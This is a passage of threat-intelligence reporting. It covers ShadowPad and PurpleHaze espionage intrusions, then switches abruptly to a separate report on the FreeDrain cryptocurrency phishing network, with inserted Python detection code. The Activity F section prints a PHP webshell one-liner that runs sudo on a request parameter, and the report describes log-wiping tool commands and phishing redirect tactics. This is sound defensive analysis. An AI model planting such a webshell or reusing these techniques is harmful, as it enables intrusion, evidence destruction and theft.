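    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).decode().rstrip("=")


def encode_name(name: str) -> bytes:
    """DNS wire form: length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(msg: bytes, offset: int):
    """Read a name at offset, following RFC 1035 compression pointers.
    Returns (name, offset of the byte after the name as it appeared)."""
    labels, end, hops = [], None, 0
    while True:
        if offset >= len(msg):
            raise ValueError("truncated name")
        length = msg[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            if offset + 1 >= len(msg):
                raise ValueError("truncated pointer")
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            return ".".join(labels), (end if end is not None else offset)
        labels.append(msg[offset:offset + length].decode("ascii", "replace"))
        offset += length


def build_doh_get(name: str, resolver: str = "https://doh.resolver.example/dns-query", qtype: int = 1) -> str:
    """What a DoH client sends: ID 0, RD set, one question (A record by default)."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, 1)
    return f"{resolver}?dns={_b64url_encode(header + question)}"


def doh_query_names(url: str) -> list:
    """Decode the 'dns' parameter and return every QNAME in the question section."""
    params = parse_qs(urlparse(url).query)
    if "dns" not in params:
        raise ValueError("not an RFC 8484 GET request")
    msg = _b64url_decode(params["dns"][0])
    if len(msg) < 12:
        raise ValueError("DNS message shorter than its header")
    qdcount = struct.unpack("!H", msg[4:6])[0]
    names, offset = [], 12
    for _ in range(qdcount):
        name, offset = decode_name(msg, offset)
        names.append(name)
        offset += 4                                      # skip QTYPE and QCLASS
    return names


def flag_watchlisted(url: str, watchlist: set) -> list:
    """Return queried names that are on, or subdomains of, a watchlisted domain."""
    hits = []
    for name in doh_query_names(url):
        parts = name.lower().split(".")
        if any(".".join(parts[i:]) in watchlist for i in range(len(parts))):
            hits.append(name)
    return hits


# C2 domain named in the report (defanged in the text); the request is constructed.
SAMPLE_URL = build_doh_get("news.imaginerjp.com")

if __name__ == "__main__":
    print(SAMPLE_URL)
    print(flag_watchlisted(SAMPLE_URL, {"imaginerjp.com"}))
```

The decoder walks the question section rather than grepping the parameter for a substring, because the Base64 alphabet realigns every three bytes and a domain split across that boundary never appears as a contiguous string in the encoded form.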
AppSov.exe is obfuscated using dispatcher routines that alter control flow, displacements placed after each invocation of these routines, and opaque predicates. The malware verifies its integrity using the constant values 0x89D17427, 0x254733D6, 0x6FE2CF4E, and 0x110302D6. It is distributed with three modules: one with the ID 0x0A and two with the ID 0x20. The ShadowPad module IDs designate different types of modules, including configuration data or code that implements malware functionalities such as injection or data theft.
AppSov.exe: ShadowPad module IDs and sizes
AppSov.exe: Deobfuscated dispatcher routine
For a detailed overview of the ScatterBrain obfuscation mechanism and additional ShadowPad implementation details, we refer to previous research by Google Threat Intelligence Group.
Activity B & C | A Global ShadowPad Operation
Based on various implementation overlaps with AppSov.exe, including configuration data as well as custom decryption and integrity verification constant values, we identified multiple additional ShadowPad samples obfuscated using ScatterBee variants. This also led to the discovery of related infrastructure, including the ShadowPad C2 servers dscriy.chtq[.]net and updata.dsqurey[.]com, as well as the suspected ShadowPad-related domains network.oossafe[.]com and notes.oossafe[.]com.
Deobfuscated integrity verification routine in AppSov.exe
Deobfuscated integrity verification routine in another ShadowPad sample
Some of the samples we identified differ in execution from AppSov.exe. Instead of embedding the full ShadowPad functionality and configuration within a single executable, they are implemented as Windows DLLs designed to be loaded by specific legitimate executables vulnerable to DLL hijacking. These DLLs then load an external file with an eight-character name and the .tmp extension, for example 1D017DF2.tmp.
Using C2 netflow and SentinelOne telemetry data, we identified a broad range of victim organizations compromised by the ShadowPad samples we discovered. Between July 2024 and March 2025, this malware was involved in intrusions at over 70 organizations across multiple regions globally, spanning sectors such as manufacturing, government, finance, telecommunications, and research. Among the victims was the IT services and logistics company that was managing hardware logistics for SentinelOne employees at the time (Activity C).
Geographical distribution of victims
We suspect that the most common initial access vector involved the exploitation of Check Point gateway devices, consistent with previous research on this topic. We also observed communication to ShadowPad C2 servers originating from Fortinet Fortigate, Microsoft IIS, SonicWall, and CrushFTP servers, suggesting potential exploitation of these systems as well.
Technical Details | PurpleHaze
We present below technical details on intrusions that are part of the PurpleHaze threat cluster: the intrusion into the South Asian government entity in October 2024 (Activity D, the same organization compromised using ShadowPad in June 2024), the reconnaissance of SentinelOne infrastructure in October 2024 (Activity E), and the intrusion into the European media organization in September 2024 (Activity F).
Activity D | GOREshell & a China-based ORB Network
In early October 2024, we detected system reconnaissance and malware deployment activities on a workstation within the South Asian government entity. The threat actor executed the ipconfig Windows command to query network configuration and established a connection to IP address 103.248.61[.]36 on port 443. The adversary then created the C:\Program Files\VMware\VGAuth directory and downloaded an archive file named VGAuth1.zip from 103.248.61[.]36; after extracting its contents into the VGAuth directory, the archive was deleted.
The archive file contained two executables: a legitimate VGAuthService.exe executable and a malicious DLL file named glib-2.0.dll (original filename: libglib-2.0-0.dll), which masquerades as a legitimate GLib-2.0 library file.
VGAuthService.exe implements the VMware Guest Authentication Service. The threat actor deployed version 11.3.5.59284, signed by VMware and compiled on Tuesday, August 31, 2021, 06:14:07 UTC. This version is vulnerable to DLL hijacking.
The threat actor then created a new Windows service named VGAuthService, which automatically starts upon system boot, runs the VGAuthService.exe executable, and displays as Alias Manager and Ticket Service. When the service was started, VGAuthService.exe loaded and executed the malicious glib-2.0.dll library file.
glib-2.0.dll implements the GOREshell backdoor, which uses reverse_ssh functionalities to establish SSH connections to attacker-controlled endpoints. The backdoor is implemented in the Go programming language and obfuscated using Garble, including string literals, package paths, and function names. It uses the cgo library to invoke C code.
glib-2.0.dll: Obfuscated form of the string Fail to detect service: %v
glib-2.0.dll contains a private SSH key used for establishing SSH connections to the threat actor’s C2 server.
The malware was configured to use downloads.trendav[.]vip for C2 purposes. This domain resolved to 142.93.214[.]219 at the time of the activity. glib-2.0.dll establishes SSH connections over the Websocket protocol (wss[://]downloads.trendav[.]vip:443).
Network request issued by glib-2.0.dll
The threat actor deployed GOREshell variants not only on Windows systems but also on Linux. This includes two samples: one masquerading as the snapd Linux service and the other as the update-notifier service. The threat actor deployed both samples as Linux services, which included creating service configuration files, such as /usr/lib/systemd/system/update-notifier.service.
The content of update-notifier.service
In contrast to update-notifier, which is obfuscated using Garble and packed with UPX, snapd is not obfuscated. Both samples use epp.navy[.]ddns[.]info as their C2 servers and are configured to proxy connections through a local IP address over port 8080. Additionally, both samples store the same private SSH key as glib-2.0.dll.
Based on the private key stored in glib-2.0.dll, snapd, and update-notifier, we discovered an additional GOREshell variant, which was uploaded on a malware sharing platform in September 2023. This GOREshell variant is implemented as a tapisrv.dll library file (Microsoft Windows Telephony Server) and loaded as a Windows service by the svchost.exe service container process. The malware uses the mail.ccna[.]organiccrap[.]com domain for C2 purposes.
The discovery of the tapisrv.dll sample indicates reuse of the private key in intrusions separated by a considerable period.
Private key reuse
We associate some of the GOREshell C2 infrastructure with an ORB network, which we track as being operated from China and actively used by several suspected Chinese cyberespionage actors, including overlaps with APT15.
The threat actor made significant efforts to obscure their activity and remove evidence of their presence, including timestomping GOREshell executable files and deploying a log removal tool on Linux systems, specifically at the /usr/sbin/mcl filepath.
Our analysis of mcl suggests that the executable is likely a compiled and modified version of the source code of a tool called clear13, developed by members of The Hacker’s Choice community. The source code of clear13 is publicly available on GitHub.
The mcl executable is packed using a custom-modified version of UPX. The tool supports four commands, which are presented to the user through a help menu.
Command | Displayed help text | Description
sudo | sudo cmd | Executes a specified command (cmd) with elevated privileges using sudo.
clear | clear name | Removes the last entry containing a specified username (name) from /var/log/wtmp, /var/run/utmp, and /var/log/lastlog.
secure | secure timeString | Removes all entries matching a specified pattern (timeString) from /var/log/secure.
history | history leftNum | Truncates the user command history, keeping only a specified number of entries (leftNum).
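The wtmp/utmp editing described above leaves a gap a defender can look for: an SSH login that sshd recorded in /var/log/secure but that has no matching USER_PROCESS record in /var/log/wtmp. The Python below is an added example, not code from the report or from mcl; it parses the glibc x86_64 utmp record layout and cross-checks it against sshd log lines. The 60-second match window, the assumed log year and all sample records are constructed for illustration.

```python
import re
import struct
from datetime import datetime, timezone

# glibc 'struct utmp' on x86_64 Linux: 384 bytes per record in /var/log/wtmp
# and /var/run/utmp. Fields: ut_type, (pad), ut_pid, ut_line, ut_id, ut_user,
# ut_host, ut_exit (2 shorts), ut_session, ut_tv (sec, usec), ut_addr_v6, unused.
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS = 7                        # ut_type of an interactive login
BOOT_TIME = 2

# sshd line in /var/log/secure (rsyslog default timestamp, which omits the year).
AUTH_RE = re.compile(
    r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Accepted \w+ for (\S+) from (\S+)"
)


def epoch(ts_text):
    """'YYYY-MM-DD HH:MM:SS' (UTC) -> Unix time; used to build sample data."""
    dt = datetime.strptime(ts_text, "%Y-%m-%d %H:%M:%S")
    return int(dt.replace(tzinfo=timezone.utc).timestamp())


def pack_record(ut_type, pid, line, user, host, ts):
    """Build one wtmp record (constructed sample data only)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, ts, 0, 0, 0, 0, 0)


def parse_wtmp(data):
    """Yield one dict per record. A length that is not a whole number of
    records is itself suspicious: log editors rewrite the file in place."""
    if len(data) % UTMP_SIZE:
        raise ValueError("wtmp length %d is not a multiple of %d" % (len(data), UTMP_SIZE))
    for off in range(0, len(data), UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        yield {"type": f[0], "pid": f[1],
               "user": f[4].rstrip(b"\0").decode("utf-8", "replace"),
               "host": f[5].rstrip(b"\0").decode("utf-8", "replace"),
               "ts": f[9]}


def parse_secure(lines, year):
    """Yield accepted sshd logins; the year is supplied because syslog omits it."""
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        dt = datetime.strptime("%d %s" % (year, m.group(1)), "%Y %b %d %H:%M:%S")
        yield {"user": m.group(2), "host": m.group(3),
               "ts": int(dt.replace(tzinfo=timezone.utc).timestamp())}


def find_missing_logins(wtmp_bytes, secure_lines, year, window=60):
    """Return (user, host, ts) for sshd logins with no USER_PROCESS wtmp record
    for the same user within `window` seconds: the footprint left when a login
    record is removed from wtmp while the sshd log line survives."""
    logins = [r for r in parse_wtmp(wtmp_bytes) if r["type"] == USER_PROCESS]
    missing = []
    for a in parse_secure(secure_lines, year):
        if not any(r["user"] == a["user"] and abs(r["ts"] - a["ts"]) <= window
                   for r in logins):
            missing.append((a["user"], a["host"], a["ts"]))
    return missing


# Constructed sample: three sshd logins, but wtmp only holds two of them.
SAMPLE_SECURE = [
    "Sep  5 10:14:02 web01 sshd[2113]: Accepted publickey for alice from 10.0.0.5 port 51222 ssh2",
    "Sep  5 11:02:10 web01 sshd[2290]: Accepted password for bob from 10.0.0.9 port 40011 ssh2",
    "Sep  5 23:41:55 web01 sshd[3871]: Accepted publickey for svc-backup from 203.0.113.7 port 60210 ssh2",
    "Sep  5 23:42:30 web01 sshd[3871]: pam_unix(sshd:session): session opened for user svc-backup",
]
SAMPLE_WTMP = b"".join([
    pack_record(BOOT_TIME, 0, "~", "reboot", "6.1.0", epoch("2024-09-05 08:00:00")),
    pack_record(USER_PROCESS, 2113, "pts/0", "alice", "10.0.0.5", epoch("2024-09-05 10:14:03")),
    pack_record(USER_PROCESS, 2290, "pts/1", "bob", "10.0.0.9", epoch("2024-09-05 11:02:11")),
    # the svc-backup login record is absent, as after 'clear svc-backup'
])

if __name__ == "__main__":
    for user, host, ts in find_missing_logins(SAMPLE_WTMP, SAMPLE_SECURE, 2024):
        print("wtmp gap: %s from %s at %d" % (user, host, ts))
```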
Activity E | Probing & Reconnaissance of SentinelOne Infrastructure
In October 2024, SentinelLABS observed consistent attempts to establish remote connections to multiple Internet-facing SentinelOne servers over port 443 for reconnaissance purposes.
Our analysis of the infrastructure associated with this activity revealed links to the October 2024 intrusion into the South Asian government entity (Activity D).
We identified server characteristics and domain registration patterns suggesting coordinated infrastructure management and bulk domain registration, likely carried out by the same threat actor conducting reconnaissance on SentinelOne infrastructure and involved in Activity D, or by a third-party entity responsible for managing the infrastructure used in both activities.
The connections we initially observed originated from a virtual private server (VPS) that used a C2 server as a proxy. At the time of the activity, the server had an IP address of 128.199.124[.]136, which was mapped to the domain name tatacom.duckdns[.]org and was designed to appear as part of a major South Asian telecommunications provider’s infrastructure.
Based on a unique server fingerprint, SentinelLABS discovered an extensive collection of related network infrastructure.
Infrastructure overview
The C2 domain downloads.trendav[.]vip, observed in Activity D, resolved to the IP address 142.93.214[.]219. We also identified this IP address based on the server fingerprint. Furthermore, the IP address of a server associated with the same fingerprint, 143.244.137[.]54, was mapped to the domain name cloud.trendav[.]co in October 2024. This domain name overlaps with downloads.trendav[.]vip.
Additionally, historical domain registration records show that the root domain trendav[.]vip was originally registered through Dynadot Inc., on 24 October 2023, at 13:05:29 UTC. Identifying all domains registered through the same registrar at the exact same date and time (to the second) reveals the domains secmailbox[.]us and sentinelxdr[.]us, the latter of which likely masquerades as SentinelOne infrastructure.
Between February and April 2025, the sentinelxdr[.]us domain resolved to 142.93.214[.]219, the same IP address that downloads.trendav[.]vip resolved to in October 2024.
In October 2024, mail.secmailbox[.]us resolved to 142.93.212[.]42. Like the server at IP address 142.93.214[.]219 (downloads.trendav[.]vip/sentinelxdr[.]us), this server shared the same server fingerprint.
Furthermore, domain registration data for sentinelxdr[.]us was updated on 25 September 2024, at 01:43:46 UTC, a date and time that is identical to an update of the registration data of trendav[.]vip.
Activity F | The Return of dsniff
The late September 2024 intrusion into the European media organization showed overlaps in tooling with the October 2024 intrusion into the South Asian government entity (Activity D). These overlaps include the use of the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice community.
The threat actor deployed a UPX-packed GOREshell sample, which was configured to use 107.173.111[.]26 over the WebSocket protocol for C2 communication (wss[://]107.173.111[.]26:443). The executable file we retrieved contains a private SSH key and the public SSH key fingerprint f0746e78e49896dfa01c674bf2a800443b1966c54663db5c679bc86533352590.
Based on the fingerprint, we identified a Garble-obfuscated GOREshell sample that was uploaded to a malware sharing platform from Iran in late July 2024. This GOREshell sample also contains a private SSH key and is configured to use the same C2 server, 107.173.111[.]26, over the TLS protocol (tls[://]107.173.111[.]26:80).
This suggests threat actor activity since at least July 2024, possibly targeting organizations in both Europe and the Middle East.
The threat actor also deployed version 2.5a1 of dsniff, a collection of tools for network auditing and penetration testing. With active development of dsniff having been discontinued for over 15 years, our investigation of public source code repositories revealed that the THC community has released version 2.5a1 in an effort to resume active maintenance of the project.
To obfuscate their presence, the threat actor timestomped deployed executables, setting their creation date to September 15, 2021. After gaining initial access to the environment, the perpetrators deployed a simple PHP webshell that enables remote command execution by passing commands via the a parameter and executing them with elevated privileges using sudo.
<?php system('/bin/sudo '. @$_REQUEST['a']);?>
Our investigation of system and network traffic artifacts strongly suggests that the threat actor gained an initial foothold by exploiting CVE-2024-8963 in conjunction with CVE-2024-8190 (both Ivanti Cloud Services Appliance vulnerabilities) on September 5, 2024, a few days before their public disclosure.
We track some of the malicious infrastructure used in this attack as part of an ORB network, which we suspect is operated from China and includes compromised network edge devices.
Conclusions
This post highlights the persistent threat posed by China-nexus cyberespionage actors to a wide range of industries and public sector organizations, including cybersecurity vendors themselves. The activities detailed in this research reflect the strong interest these actors have in the very organizations tasked with defending digital infrastructure.
Our findings underscore the critical need for constant vigilance, robust monitoring, and rapid response capabilities. By publicly sharing details of our investigations, we aim to provide insight into the rarely discussed targeting of cybersecurity vendors, helping to destigmatize sharing of IOCs related to these campaigns, and thus contribute to a deeper understanding of the tactics, objectives, and operational patterns of China-nexus threat actors. As these adversaries continue to adapt to our response efforts, it’s essential that defenders prioritize transparency, intelligence sharing, and coordinated action over the fear of reputational harm.
We encourage others in the industry to adopt a proactive approach to threat intelligence sharing and defense coordination, recognizing that collective security strengthens the entire community.
We are grateful to our partners at Lumen Technologies Black Lotus Labs for their collaboration and support.
FreeDrain is an industrial-scale, global cryptocurrency phishing operation that has been stealing digital assets for years.
FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io), and layered redirection techniques to target cryptocurrency wallets.
Victims search for wallet-related queries, click on high-ranking malicious results, land on lure pages, and are redirected to phishing pages that steal their seed phrases.
SentinelLABS and Validin researchers identified over 38,000 distinct FreeDrain subdomains hosting lure pages.
Phishing pages are hosted on cloud infrastructure like Amazon S3 and Azure Web Apps, mimicking legitimate cryptocurrency wallet interfaces.
Evidence suggests the operators are based in the UTC+05:30 timezone (Indian Standard Time) and work standard weekday hours.
FreeDrain represents a modern, scalable phishing operation that exploits weaknesses in free publishing platforms and requires better platform-level defenses, user education, and security community collaboration.
Unveiled today at PIVOTcon, this joint research from Validin, the global internet intelligence platform, and SentinelLABS, the threat intelligence and research team of SentinelOne, exposes the FreeDrain Network: a sprawling, industrial-scale cryptocurrency phishing operation that has quietly siphoned digital assets for years. What began as an investigation into a single phishing page quickly uncovered a vast, coordinated campaign weaponizing search engine optimization, free-tier web services, and layered redirection techniques to systematically target and drain cryptocurrency wallets at scale.
In this collaborative blog, we detail the technical anatomy of the FreeDrain operation from the discovery process and infrastructure mapping to evasion techniques and the end-to-end workflow attackers use to funnel victims through multilayered financial theft paths. We also walk through the custom tooling we built to hunt, track, and monitor this large campaign in real time.
Our findings highlight the growing sophistication of financially motivated threat actors and the systemic risks posed by under-moderated publishing platforms. This research underscores the need for adaptive detection, proactive monitoring, and tighter safeguards across the ecosystem to disrupt threats like FreeDrain before they scale.
The Plea for Help
Our investigation into what would become the FreeDrain Network began on May 12, 2024, when Validin received a message from a distressed individual who had lost approximately 8 BTC, worth around $500,000 at the time. The victim had unknowingly submitted their wallet seed phrase to a phishing site while attempting to check their wallet balance, after clicking on a highly-ranked search engine result.
Request for help after successful phish
The individual had come across a Validin blog post from April 2024, which documented a series of crypto-draining phishing pages. The phishing site they encountered shared striking similarities to the infrastructure we had analyzed—specifically, pages hosted on azurewebsites[.]net, along with additional dedicated domain names.
Trusted cryptocurrency tracking analysts confirmed that the destination wallet used to receive the victim’s funds was a one-time-use address. The stolen assets were quickly moved through a cryptocurrency mixer, an obfuscation method that fragments and launders funds across multiple transactions, making attribution and recovery nearly impossible.
While we weren’t able to assist in recovering the lost assets, this outreach marked a turning point. It became clear that the incident was not isolated. We set out to uncover the infrastructure behind the scam and understand the broader operation enabling these thefts to occur at scale.
Cracking the Surface – Our First Look at FreeDrain
When Validin published the initial findings in April 2024, one key piece of the puzzle remained unclear: how were these phishing pages reaching victims at scale? While common delivery methods like phishing emails, SMS (smishing), social media posts, and blog comment spam are frequently used in cryptocurrency scams, none appeared to be the source in this case.
That changed with the report from the victim in May. They had encountered the phishing site via a top-ranked search engine result, not a suspicious message or unsolicited link.
Curious whether we could reproduce the victim’s experience, we conducted a series of keyword searches ourselves. The results were startling.
Search terms like “Trezor wallet balance” returned multiple malicious results across Google, Bing, and DuckDuckGo, often within the first few result pages.
Trezor Wallet Balance malicious result in DuckDuckGo
Trezor Wallet Balance malicious result in top Bing Search
Trezor Wallet Balance malicious result in Top Google Search result
These were not obscure or poorly maintained phishing sites; they were professionally crafted lure pages freely hosted on subdomains of trusted platforms like gitbook.io, webflow.io, and github.io.
This discovery marked our first real glimpse into the scale and sophistication of the FreeDrain campaign—and raised a host of new questions. Specifically, what is the overall workflow once a victim visits the site, how are these pages becoming so highly ranked, and what can we discover about the attackers themselves?
Workflow – A Victim’s Path to Compromise
To understand how victims were being funneled into this operation and the post-visit workflow, we checked out the top-ranked search results that we knew weren’t connected to authoritative, legitimate websites, looking for malicious behavior. Within minutes, we encountered related live phishing pages, and quickly began piecing together the end-to-end workflow that a typical victim might experience.
The attack chain was deceptively simple:
Search for wallet-related queries (e.g., “Trezor wallet balance”) on a major search engine.
Click a high-ranking result, often hosted on a seemingly trustworthy platform like gitbook.io or webflow.io.
Land on a page displaying a large, clickable image, a static screenshot of the legitimate wallet interface.
Click the image, which either:
Redirects the user to legitimate websites.
Redirects the user through one or more intermediary sites
Directly leads to a phishing page.
Arrive at the final phishing site, a near-perfect clone of the real wallet service, prompting the user to input their seed phrase.
Attack chain summary
The entire flow is frictionless by design, blending SEO manipulation, familiar visual elements, and platform trust to lull victims into a false sense of legitimacy. And once a seed phrase is submitted, the attacker’s automated infrastructure will drain funds within minutes.
Lure page linking to phishing page
Redirect to legitimate site
Lure Page Ranking – Weaponizing SEO
We were stunned by the sheer volume of lure pages appearing among top-ranked search results across all major search engines. These weren’t complex, multi-layered scams. In most cases, the pages consisted of just a single large image (again, usually a screenshot of a legitimate crypto wallet interface) followed by a few lines of text that offered seemingly helpful instructions, ironically, some even claimed to educate users on how to avoid phishing.
This type of simplistic, Q&A-style content is well-known in SEO circles for being rewarded by search engine algorithms. Because users often turn to search engines for direct answers, pages that appear to offer guidance, even when malicious, can be algorithmically elevated in rankings, especially when hosted on high-reputation platforms.
In our early investigation (May–June 2024), we found that many of these lure pages were hosted on services like webflow.io and gitbook.io. Both platforms provide low-friction publishing, enabling anyone to spin up a custom subdomain and publish arbitrary content for free. The subdomains used followed familiar spammer patterns, frequent use of hyphens, deliberate misspellings, and keyword stuffing to manufacture variation and dodge blacklisting.
Subdomain naming scheme similarities
Generative AI as a Tool for Scale
The text on many lure pages bore clear signs of having been generated by large language models. We found copy-paste artifacts that revealed the specific tools used, most notably, strings like “4o mini”, a likely reference to OpenAI’s GPT-4o mini model. These telltale traces suggest that FreeDrain operators are leveraging generative AI not only to create scalable content but doing so carelessly at times.
Fake content mistakenly including OpenAI GPT-4o mini reference
FreeDrain’s Secret Weapon – Spamdexing
But content alone doesn’t explain how these pages were getting indexed and ranked above legitimate sources. How were search engines even discovering them?
The answer came when we identified several indexed URLs pointing back to high-ranking lure pages, and traced them to massive comment spam campaigns. FreeDrain operators appear to be heavily abusing neglected web properties that allow open or weakly-moderated comments, flooding them with links pointing to their lure pages. This old tactic, known as spamdexing, is a well-documented SEO abuse technique, which FreeDrain makes heavy use of as one of the ways to attempt to game SEO.
In one striking example, we found a Korean university photo album page with a single image uploaded over a decade ago, buried under 26,000 comments, nearly all of them containing spam links.
FreeDrain uses large-scale comment spam on poorly-maintained websites to boost the visibility of their lure pages via search engine indexing
This technique allows FreeDrain to sidestep traditional delivery vectors like phishing emails or malicious ads, instead meeting victims exactly where they’re looking, at the top of trusted search engines.
Tracking Search Results
Understanding how FreeDrain’s lure pages consistently climbed to the top of search results became a key investigative goal, and it demanded custom tooling.
We built a purpose-specific crawler designed solely to emulate search engine queries, navigate through pages of search results, and extract structured data from each result: URLs, page titles, and text content summaries. The goal was to systematically monitor how malicious pages were ranking, shifting, and proliferating over time.
We ran this system daily across 700 unique keyword permutations, capturing up to 40 pages deep per search query, per search engine. This daily monitoring provided a dynamic, longitudinal view into the visibility of FreeDrain’s infrastructure.
The Scale of Abuse
After four months of collection, we amassed a dataset of more than 200,000 unique URLs, drawn from topical search results across at least a dozen different publishing platforms that allow users to create custom subdomains. Aggressively filtering, we identified over 38,000 distinct FreeDrain subdomains hosting the lure pages.
These subdomains appeared on well-known free hosting and publishing platforms, including:
Gitbook (gitbook.io)
Webflow (webflow.io)
Teachable (teachable.com)
Github.io
Strikingly (mystrikingly.com)
WordPress.com
Weebly.com
GoDaddySites (godaddysites.com)
Educator Pages (educatorpages.com)
Webador (webador.com)
Breakdown of total domains to suspected URLs, to Confirmed URLs by quantity
The volume and spread across legitimate platforms further highlights how FreeDrain relies on the low-friction, high-trust nature of these services to evade detection and amplify reach.
To go beyond static discovery, we implemented scheduled re-crawls of every suspected lure page. This allowed us to track:
Content updates over time
Changes in redirect behavior
New final-stage phishing URLs being introduced
Takedowns and domain churn
This gave us a clearer picture of FreeDrain’s infrastructure lifecycle, from initial lure page creation to eventual takedown or abandonment, which helped us understand the rotation strategies used to keep malicious links live and searchable.
Lure Page Breakdown
Despite being spread across a wide array of publishing platforms, FreeDrain lure pages followed a remarkably consistent structure, carefully optimized to appear helpful and legitimate, while subtly guiding victims toward compromise.
Common Elements Observed Across Lure Pages
Across gitbook.io, webflow.io, github.io, and others, the pages typically included:
A single, large, clickable image occupying most of the viewport
This image was a screenshot of a legitimate cryptocurrency site (e.g., Trezor, Metamask, or Ledger)
The image linked externally, usually to a malicious redirection chain
AI-generated help content positioned below the image
The text answered common user queries like “How do I check my wallet balance on Trezor?”
1–2 additional embedded links, which pointed to the same external destination as the image or were placeholders like "#"
Link Behavior: Redirection Variability
Clicking the image or associated links triggered unpredictable outcomes, depending on the time, user agent, or page freshness:
Redirection through one or more intermediary domains (typically 1–5 hops)
Final destinations varied widely:
A phishing page built to capture wallet seed phrases (hosted on Azure or AWS S3)
A legitimate site like trezor.io or metamask.io, creating false reassurance
A non-functional domain (404 or NXDOMAIN)
The current page itself ("#") acting as a placeholder when infrastructure wasn’t active
This redirection behavior made classification challenging, especially since not every page led directly to a phishing endpoint in every instance. We observed that lure pages initially hosted benign content and were only modified to include malicious redirects later, usually weeks or months after creation. This aging tactic likely helped the sites build trust and survive longer before being flagged or removed.
A Github lure page that has just been changed from benign to malicious
Obfuscation Through Variation
Identifying FreeDrain lure pages at scale proved difficult due to extreme variation in phrasing, metadata, and platform-specific formatting. For example, we identified 46 unique renderings of the word “Trezor”, all visually similar, using tricks like added Unicode characters, zero-width spaces, and mixed script alphabets.
Trezor variation heatmap by quantity
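One way to collapse the Trezor renderings described above into a single comparable key, as an added Python example rather than tooling from the research: compatibility-decompose the text, drop zero-width and combining code points, map a small homoglyph table onto Latin letters, and casefold. The confusables table and the sample variants are constructed for illustration; the helper that reports which scripts a string mixes is an approximation based on Unicode character names.

```python
import unicodedata
from collections import defaultdict

# Constructed homoglyph table: non-Latin letters that render like Latin ones.
# A production version would load the Unicode confusables.txt data file.
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0442": "t", "\u0443": "y", "\u0445": "x",                       # Cyrillic lower
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X",                                                     # Cyrillic upper
    "\u03b1": "a", "\u03bf": "o", "\u03c1": "p", "\u0391": "A", "\u0392": "B",
    "\u0395": "E", "\u0397": "H", "\u039a": "K", "\u039c": "M", "\u039d": "N",
    "\u039f": "O", "\u03a1": "P", "\u03a4": "T", "\u03a7": "X",        # Greek
})


def canonicalize(text):
    """Reduce a brand rendering to a comparable ASCII key."""
    # 1. Compatibility decomposition: fullwidth, mathematical and ligature
    #    forms become plain letters; accents become separate combining marks.
    s = unicodedata.normalize("NFKD", text)
    # 2. Drop format (Cf) and combining-mark (Mn/Me) code points: zero-width
    #    spaces and joiners, soft hyphens, decorative diacritics.
    s = "".join(ch for ch in s if unicodedata.category(ch) not in ("Cf", "Mn", "Me"))
    # 3. Map Cyrillic/Greek look-alikes onto Latin letters.
    s = s.translate(CONFUSABLES)
    # 4. Keep only letters and digits, then casefold.
    return "".join(ch for ch in s if ch.isalnum()).casefold()


def scripts(text):
    """Scripts used by the letters in `text`, approximated from the first word
    of each code point's Unicode name (LATIN, CYRILLIC, GREEK, ...)."""
    names = set()
    for ch in unicodedata.normalize("NFKD", text):
        if ch.isalpha():
            names.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return names


def group_by_canonical(strings):
    """Cluster raw renderings under their canonical key."""
    groups = defaultdict(list)
    for s in strings:
        groups[canonicalize(s)].append(s)
    return dict(groups)


# Constructed variants in the styles the research describes: zero-width
# characters, diacritics, fullwidth forms, separators and mixed scripts.
SAMPLE_VARIANTS = [
    "Trezor",
    "Tre\u200bzor",                            # zero-width space
    "Tre\u200d\u200czor",                      # zero-width joiner + non-joiner
    "tre\u00adzor",                            # soft hyphen
    "Tr\u00e9zor",                             # Latin e with acute
    "\uff34\uff52\uff45\uff5a\uff4f\uff52",    # fullwidth letters
    "T.r.e.z.o.r",                             # punctuation padding
    "\u0422r\u0435z\u043er",                   # Cyrillic Te, ie, o mixed with Latin
    "TREZ\u039fR",                             # Greek capital omicron
]

if __name__ == "__main__":
    for key, members in group_by_canonical(SAMPLE_VARIANTS + ["Ledger"]).items():
        print(key, len(members), [sorted(scripts(m)) for m in members])
```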
Demonstrating the variations in tooling use, we found that FreeDrain pages on github.io were usually copies of the generated content from services like Mobrise Website Builder and Webflow.
Snippets of pages hosted on github.io with content clearly generated using other tools, for example, “Mobrise Website Builder”
A turning point in connecting these fragmented domains came from pivoting off the redirection infrastructure. While the lure content varied, the redirectors often remained consistent across pages and platforms.
Validin result showing redirector abusing free services
By tracing traffic from anchor links to known FreeDrain redirectors, we were able to map common ownership and activity across otherwise-unrelated services. This infrastructure-based pivot became essential for clustering and attribution, bridging gaps that the lure content itself couldn’t.
Redirectors
Pivoting on URLs from known and suspected FreeDrain lure pages that we were monitoring, we quickly noticed some noteworthy patterns in the FreeDrain redirection domains.
Domain Characteristics
Nearly all redirector domains shared several features:
.com TLDs exclusively
Names that appeared algorithmically generated, likely via a Domain Generation Algorithm (DGA) or Markov chain model
